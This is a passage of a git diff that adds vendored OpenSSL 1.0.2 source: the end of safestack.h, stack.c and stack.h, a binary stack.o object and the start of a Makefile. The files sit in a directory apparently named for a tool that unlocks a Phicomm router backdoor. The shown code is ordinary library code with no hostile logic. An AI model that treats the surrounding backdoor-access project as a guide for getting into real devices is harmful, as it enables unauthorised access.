+  LHM_lh_node_usage_stats_bio(FUNCTION,lh,out)
+# define lh_FUNCTION_stats_bio(lh,out) \
+  LHM_lh_stats_bio(FUNCTION,lh,out)
+# define lh_FUNCTION_free(lh) LHM_lh_free(FUNCTION,lh)
+# define lh_MEM_new() LHM_lh_new(MEM,mem)
+# define lh_MEM_insert(lh,inst) LHM_lh_insert(MEM,lh,inst)
+# define lh_MEM_retrieve(lh,inst) LHM_lh_retrieve(MEM,lh,inst)
+# define lh_MEM_delete(lh,inst) LHM_lh_delete(MEM,lh,inst)
+# define lh_MEM_doall(lh,fn) LHM_lh_doall(MEM,lh,fn)
+# define lh_MEM_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(MEM,lh,fn,arg_type,arg)
+# define lh_MEM_error(lh) LHM_lh_error(MEM,lh)
+# define lh_MEM_num_items(lh) LHM_lh_num_items(MEM,lh)
+# define lh_MEM_down_load(lh) LHM_lh_down_load(MEM,lh)
+# define lh_MEM_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(MEM,lh,out)
+# define lh_MEM_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(MEM,lh,out)
+# define lh_MEM_stats_bio(lh,out) \
+  LHM_lh_stats_bio(MEM,lh,out)
+# define lh_MEM_free(lh) LHM_lh_free(MEM,lh)
+# define lh_OBJ_NAME_new() LHM_lh_new(OBJ_NAME,obj_name)
+# define lh_OBJ_NAME_insert(lh,inst) LHM_lh_insert(OBJ_NAME,lh,inst)
+# define lh_OBJ_NAME_retrieve(lh,inst) LHM_lh_retrieve(OBJ_NAME,lh,inst)
+# define lh_OBJ_NAME_delete(lh,inst) LHM_lh_delete(OBJ_NAME,lh,inst)
+# define lh_OBJ_NAME_doall(lh,fn) LHM_lh_doall(OBJ_NAME,lh,fn)
+# define lh_OBJ_NAME_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(OBJ_NAME,lh,fn,arg_type,arg)
+# define lh_OBJ_NAME_error(lh) LHM_lh_error(OBJ_NAME,lh)
+# define lh_OBJ_NAME_num_items(lh) LHM_lh_num_items(OBJ_NAME,lh)
+# define lh_OBJ_NAME_down_load(lh) LHM_lh_down_load(OBJ_NAME,lh)
+# define lh_OBJ_NAME_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(OBJ_NAME,lh,out)
+# define lh_OBJ_NAME_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(OBJ_NAME,lh,out)
+# define lh_OBJ_NAME_stats_bio(lh,out) \
+  LHM_lh_stats_bio(OBJ_NAME,lh,out)
+# define lh_OBJ_NAME_free(lh) LHM_lh_free(OBJ_NAME,lh)
+# define lh_OPENSSL_CSTRING_new() LHM_lh_new(OPENSSL_CSTRING,openssl_cstring)
+# define lh_OPENSSL_CSTRING_insert(lh,inst) LHM_lh_insert(OPENSSL_CSTRING,lh,inst)
+# define lh_OPENSSL_CSTRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_CSTRING,lh,inst)
+# define lh_OPENSSL_CSTRING_delete(lh,inst) LHM_lh_delete(OPENSSL_CSTRING,lh,inst)
+# define lh_OPENSSL_CSTRING_doall(lh,fn) LHM_lh_doall(OPENSSL_CSTRING,lh,fn)
+# define lh_OPENSSL_CSTRING_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(OPENSSL_CSTRING,lh,fn,arg_type,arg)
+# define lh_OPENSSL_CSTRING_error(lh) LHM_lh_error(OPENSSL_CSTRING,lh)
+# define lh_OPENSSL_CSTRING_num_items(lh) LHM_lh_num_items(OPENSSL_CSTRING,lh)
+# define lh_OPENSSL_CSTRING_down_load(lh) LHM_lh_down_load(OPENSSL_CSTRING,lh)
+# define lh_OPENSSL_CSTRING_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(OPENSSL_CSTRING,lh,out)
+# define lh_OPENSSL_CSTRING_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(OPENSSL_CSTRING,lh,out)
+# define lh_OPENSSL_CSTRING_stats_bio(lh,out) \
+  LHM_lh_stats_bio(OPENSSL_CSTRING,lh,out)
+# define lh_OPENSSL_CSTRING_free(lh) LHM_lh_free(OPENSSL_CSTRING,lh)
+# define lh_OPENSSL_STRING_new() LHM_lh_new(OPENSSL_STRING,openssl_string)
+# define lh_OPENSSL_STRING_insert(lh,inst) LHM_lh_insert(OPENSSL_STRING,lh,inst)
+# define lh_OPENSSL_STRING_retrieve(lh,inst) LHM_lh_retrieve(OPENSSL_STRING,lh,inst)
+# define lh_OPENSSL_STRING_delete(lh,inst) LHM_lh_delete(OPENSSL_STRING,lh,inst)
+# define lh_OPENSSL_STRING_doall(lh,fn) LHM_lh_doall(OPENSSL_STRING,lh,fn)
+# define lh_OPENSSL_STRING_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(OPENSSL_STRING,lh,fn,arg_type,arg)
+# define lh_OPENSSL_STRING_error(lh) LHM_lh_error(OPENSSL_STRING,lh)
+# define lh_OPENSSL_STRING_num_items(lh) LHM_lh_num_items(OPENSSL_STRING,lh)
+# define lh_OPENSSL_STRING_down_load(lh) LHM_lh_down_load(OPENSSL_STRING,lh)
+# define lh_OPENSSL_STRING_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(OPENSSL_STRING,lh,out)
+# define lh_OPENSSL_STRING_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(OPENSSL_STRING,lh,out)
+# define lh_OPENSSL_STRING_stats_bio(lh,out) \
+  LHM_lh_stats_bio(OPENSSL_STRING,lh,out)
+# define lh_OPENSSL_STRING_free(lh) LHM_lh_free(OPENSSL_STRING,lh)
+# define lh_SSL_SESSION_new() LHM_lh_new(SSL_SESSION,ssl_session)
+# define lh_SSL_SESSION_insert(lh,inst) LHM_lh_insert(SSL_SESSION,lh,inst)
+# define lh_SSL_SESSION_retrieve(lh,inst) LHM_lh_retrieve(SSL_SESSION,lh,inst)
+# define lh_SSL_SESSION_delete(lh,inst) LHM_lh_delete(SSL_SESSION,lh,inst)
+# define lh_SSL_SESSION_doall(lh,fn) LHM_lh_doall(SSL_SESSION,lh,fn)
+# define lh_SSL_SESSION_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(SSL_SESSION,lh,fn,arg_type,arg)
+# define lh_SSL_SESSION_error(lh) LHM_lh_error(SSL_SESSION,lh)
+# define lh_SSL_SESSION_num_items(lh) LHM_lh_num_items(SSL_SESSION,lh)
+# define lh_SSL_SESSION_down_load(lh) LHM_lh_down_load(SSL_SESSION,lh)
+# define lh_SSL_SESSION_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(SSL_SESSION,lh,out)
+# define lh_SSL_SESSION_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(SSL_SESSION,lh,out)
+# define lh_SSL_SESSION_stats_bio(lh,out) \
+  LHM_lh_stats_bio(SSL_SESSION,lh,out)
+# define lh_SSL_SESSION_free(lh) LHM_lh_free(SSL_SESSION,lh)
+#ifdef  __cplusplus
+}
+#endif
+#endif                          /* !defined HEADER_SAFESTACK_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.c
new file mode 100644
index 0000000..47457c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.c
@@ -0,0 +1,384 @@
+/* crypto/stack/stack.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+ * Code for stacks
+ * Author - Eric Young v 1.0
+ * 1.2 eay 12-Mar-97 -  Modified sk_find so that it _DOES_ return the
+ *                      lowest index for the searched item.
+ *
+ * 1.1 eay - Take from netdb and added to SSLeay
+ *
+ * 1.0 eay - First version 29/07/92
+ */
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/stack.h>
+#include <openssl/objects.h>
+
+#undef MIN_NODES
+#define MIN_NODES       4
+
+const char STACK_version[] = "Stack" OPENSSL_VERSION_PTEXT;
+
+#include <errno.h>
+
+int (*sk_set_cmp_func(_STACK *sk, int (*c) (const void *, const void *)))
+ (const void *, const void *) {
+    int (*old) (const void *, const void *) = sk->comp;
+
+    if (sk->comp != c)
+        sk->sorted = 0;
+    sk->comp = c;
+
+    return old;
+}
+
+_STACK *sk_dup(_STACK *sk)
+{
+    _STACK *ret;
+    char **s;
+
+    if ((ret = sk_new(sk->comp)) == NULL)
+        goto err;
+    s = (char **)OPENSSL_realloc((char *)ret->data,
+                                 (unsigned int)sizeof(char *) *
+                                 sk->num_alloc);
+    if (s == NULL)
+        goto err;
+    ret->data = s;
+
+    ret->num = sk->num;
+    memcpy(ret->data, sk->data, sizeof(char *) * sk->num);
+    ret->sorted = sk->sorted;
+    ret->num_alloc = sk->num_alloc;
+    ret->comp = sk->comp;
+    return (ret);
+ err:
+    if (ret)
+        sk_free(ret);
+    return (NULL);
+}
+
+_STACK *sk_deep_copy(_STACK *sk, void *(*copy_func) (void *),
+                     void (*free_func) (void *))
+{
+    _STACK *ret;
+    int i;
+
+    if ((ret = OPENSSL_malloc(sizeof(_STACK))) == NULL)
+        return ret;
+    ret->comp = sk->comp;
+    ret->sorted = sk->sorted;
+    ret->num = sk->num;
+    ret->num_alloc = sk->num > MIN_NODES ? sk->num : MIN_NODES;
+    ret->data = OPENSSL_malloc(sizeof(char *) * ret->num_alloc);
+    if (ret->data == NULL) {
+        OPENSSL_free(ret);
+        return NULL;
+    }
+    for (i = 0; i < ret->num_alloc; i++)
+        ret->data[i] = NULL;
+
+    for (i = 0; i < ret->num; ++i) {
+        if (sk->data[i] == NULL)
+            continue;
+        if ((ret->data[i] = copy_func(sk->data[i])) == NULL) {
+            while (--i >= 0)
+                if (ret->data[i] != NULL)
+                    free_func(ret->data[i]);
+            sk_free(ret);
+            return NULL;
+        }
+    }
+    return ret;
+}
+
+_STACK *sk_new_null(void)
+{
+    return sk_new((int (*)(const void *, const void *))0);
+}
+
+_STACK *sk_new(int (*c) (const void *, const void *))
+{
+    _STACK *ret;
+    int i;
+
+    if ((ret = OPENSSL_malloc(sizeof(_STACK))) == NULL)
+        goto err;
+    if ((ret->data = OPENSSL_malloc(sizeof(char *) * MIN_NODES)) == NULL)
+        goto err;
+    for (i = 0; i < MIN_NODES; i++)
+        ret->data[i] = NULL;
+    ret->comp = c;
+    ret->num_alloc = MIN_NODES;
+    ret->num = 0;
+    ret->sorted = 0;
+    return (ret);
+ err:
+    if (ret)
+        OPENSSL_free(ret);
+    return (NULL);
+}
+
+int sk_insert(_STACK *st, void *data, int loc)
+{
+    char **s;
+
+    if (st == NULL)
+        return 0;
+    if (st->num_alloc <= st->num + 1) {
+        s = OPENSSL_realloc((char *)st->data,
+                            (unsigned int)sizeof(char *) * st->num_alloc * 2);
+        if (s == NULL)
+            return (0);
+        st->data = s;
+        st->num_alloc *= 2;
+    }
+    if ((loc >= (int)st->num) || (loc < 0))
+        st->data[st->num] = data;
+    else {
+        int i;
+        char **f, **t;
+
+        f = st->data;
+        t = &(st->data[1]);
+        for (i = st->num; i >= loc; i--)
+            t[i] = f[i];
+
+#ifdef undef                    /* no memmove on sunos :-( */
+        memmove(&(st->data[loc + 1]),
+                &(st->data[loc]), sizeof(char *) * (st->num - loc));
+#endif
+        st->data[loc] = data;
+    }
+    st->num++;
+    st->sorted = 0;
+    return (st->num);
+}
+
+void *sk_delete_ptr(_STACK *st, void *p)
+{
+    int i;
+
+    for (i = 0; i < st->num; i++)
+        if (st->data[i] == p)
+            return (sk_delete(st, i));
+    return (NULL);
+}
+
+void *sk_delete(_STACK *st, int loc)
+{
+    char *ret;
+    int i, j;
+
+    if (!st || (loc < 0) || (loc >= st->num))
+        return NULL;
+
+    ret = st->data[loc];
+    if (loc != st->num - 1) {
+        j = st->num - 1;
+        for (i = loc; i < j; i++)
+            st->data[i] = st->data[i + 1];
+        /*
+         * In theory memcpy is not safe for this memcpy( &(st->data[loc]),
+         * &(st->data[loc+1]), sizeof(char *)*(st->num-loc-1));
+         */
+    }
+    st->num--;
+    return (ret);
+}
+
+static int internal_find(_STACK *st, void *data, int ret_val_options)
+{
+    const void *const *r;
+    int i;
+
+    if (st == NULL)
+        return -1;
+
+    if (st->comp == NULL) {
+        for (i = 0; i < st->num; i++)
+            if (st->data[i] == data)
+                return (i);
+        return (-1);
+    }
+    sk_sort(st);
+    if (data == NULL)
+        return (-1);
+    r = OBJ_bsearch_ex_(&data, st->data, st->num, sizeof(void *), st->comp,
+                        ret_val_options);
+    if (r == NULL)
+        return (-1);
+    return (int)((char **)r - st->data);
+}
+
+int sk_find(_STACK *st, void *data)
+{
+    return internal_find(st, data, OBJ_BSEARCH_FIRST_VALUE_ON_MATCH);
+}
+
+int sk_find_ex(_STACK *st, void *data)
+{
+    return internal_find(st, data, OBJ_BSEARCH_VALUE_ON_NOMATCH);
+}
+
+int sk_push(_STACK *st, void *data)
+{
+    return (sk_insert(st, data, st->num));
+}
+
+int sk_unshift(_STACK *st, void *data)
+{
+    return (sk_insert(st, data, 0));
+}
+
+void *sk_shift(_STACK *st)
+{
+    if (st == NULL)
+        return (NULL);
+    if (st->num <= 0)
+        return (NULL);
+    return (sk_delete(st, 0));
+}
+
+void *sk_pop(_STACK *st)
+{
+    if (st == NULL)
+        return (NULL);
+    if (st->num <= 0)
+        return (NULL);
+    return (sk_delete(st, st->num - 1));
+}
+
+void sk_zero(_STACK *st)
+{
+    if (st == NULL)
+        return;
+    if (st->num <= 0)
+        return;
+    memset((char *)st->data, 0, sizeof(st->data) * st->num);
+    st->num = 0;
+}
+
+void sk_pop_free(_STACK *st, void (*func) (void *))
+{
+    int i;
+
+    if (st == NULL)
+        return;
+    for (i = 0; i < st->num; i++)
+        if (st->data[i] != NULL)
+            func(st->data[i]);
+    sk_free(st);
+}
+
+void sk_free(_STACK *st)
+{
+    if (st == NULL)
+        return;
+    if (st->data != NULL)
+        OPENSSL_free(st->data);
+    OPENSSL_free(st);
+}
+
+int sk_num(const _STACK *st)
+{
+    if (st == NULL)
+        return -1;
+    return st->num;
+}
+
+void *sk_value(const _STACK *st, int i)
+{
+    if (!st || (i < 0) || (i >= st->num))
+        return NULL;
+    return st->data[i];
+}
+
+void *sk_set(_STACK *st, int i, void *value)
+{
+    if (!st || (i < 0) || (i >= st->num))
+        return NULL;
+    return (st->data[i] = value);
+}
+
+void sk_sort(_STACK *st)
+{
+    if (st && !st->sorted) {
+        int (*comp_func) (const void *, const void *);
+
+        /*
+         * same comment as in sk_find ... previously st->comp was declared as
+         * a (void*,void*) callback type, but this made the population of the
+         * callback pointer illogical - our callbacks compare type** with
+         * type**, so we leave the casting until absolutely necessary (ie.
+         * "now").
+         */
+        comp_func = (int (*)(const void *, const void *))(st->comp);
+        qsort(st->data, st->num, sizeof(char *), comp_func);
+        st->sorted = 1;
+    }
+}
+
+int sk_is_sorted(const _STACK *st)
+{
+    if (!st)
+        return 1;
+    return st->sorted;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.h
new file mode 100644
index 0000000..eb07216
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.h
@@ -0,0 +1,107 @@
+/* crypto/stack/stack.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_STACK_H
+# define HEADER_STACK_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct stack_st {
+    int num;
+    char **data;
+    int sorted;
+    int num_alloc;
+    int (*comp) (const void *, const void *);
+} _STACK;                       /* Use STACK_OF(...) instead */
+
+# define M_sk_num(sk)            ((sk) ? (sk)->num:-1)
+# define M_sk_value(sk,n)        ((sk) ? (sk)->data[n] : NULL)
+
+int sk_num(const _STACK *);
+void *sk_value(const _STACK *, int);
+
+void *sk_set(_STACK *, int, void *);
+
+_STACK *sk_new(int (*cmp) (const void *, const void *));
+_STACK *sk_new_null(void);
+void sk_free(_STACK *);
+void sk_pop_free(_STACK *st, void (*func) (void *));
+_STACK *sk_deep_copy(_STACK *, void *(*)(void *), void (*)(void *));
+int sk_insert(_STACK *sk, void *data, int where);
+void *sk_delete(_STACK *st, int loc);
+void *sk_delete_ptr(_STACK *st, void *p);
+int sk_find(_STACK *st, void *data);
+int sk_find_ex(_STACK *st, void *data);
+int sk_push(_STACK *st, void *data);
+int sk_unshift(_STACK *st, void *data);
+void *sk_shift(_STACK *st);
+void *sk_pop(_STACK *st);
+void sk_zero(_STACK *st);
+int (*sk_set_cmp_func(_STACK *sk, int (*c) (const void *, const void *)))
+ (const void *, const void *);
+_STACK *sk_dup(_STACK *st);
+void sk_sort(_STACK *st);
+int sk_is_sorted(const _STACK *st);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/stack.o
new file mode 100644
index 0000000000000000000000000000000000000000..8e2f681300c210d05b162bffd1ff19bd9c05934d
GIT binary patch
literal 5776
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/Makefile
new file mode 100644
index 0000000..0dcfd78
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/Makefile
@@ -0,0 +1,112 @@
+#
